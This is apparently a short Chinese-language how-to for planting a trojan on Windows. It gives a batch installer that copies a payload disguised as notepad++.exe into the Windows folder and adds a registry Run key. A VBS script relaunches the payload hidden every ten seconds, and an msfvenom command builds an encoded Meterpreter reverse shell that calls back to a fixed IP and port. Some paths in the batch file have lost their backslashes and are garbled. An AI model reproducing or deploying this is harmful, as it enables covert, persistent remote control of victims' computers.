install.bat
@echo off if exist %windir% otepad++.exe goto nt copy notepad++.exe %windir% copy x86_run.vbs %windir% :nt echo the notepad++ file is exist! echo; reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v notepad++ /t reg_sz /d %windir%x86_run.vbs /f pause
注:notepad++.exe和notepad++是木马(使用时得改名)
x86_run.vbs
do
wscript.createobject("wscript.shell").run "notepad++.exe",0,true
wscript.sleep(10000)
loop
注:10秒运行一次
[notepad++.exe] [install.bat] [x86_run.vbs] 三个文件一起扔进"C:Windows"下, 运行install.bat即可.
notepad++.exe的生成,请参考kali linux msf
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' LHOST=192.168.137.135 LPORT=4599 -f exe > notepad++.exe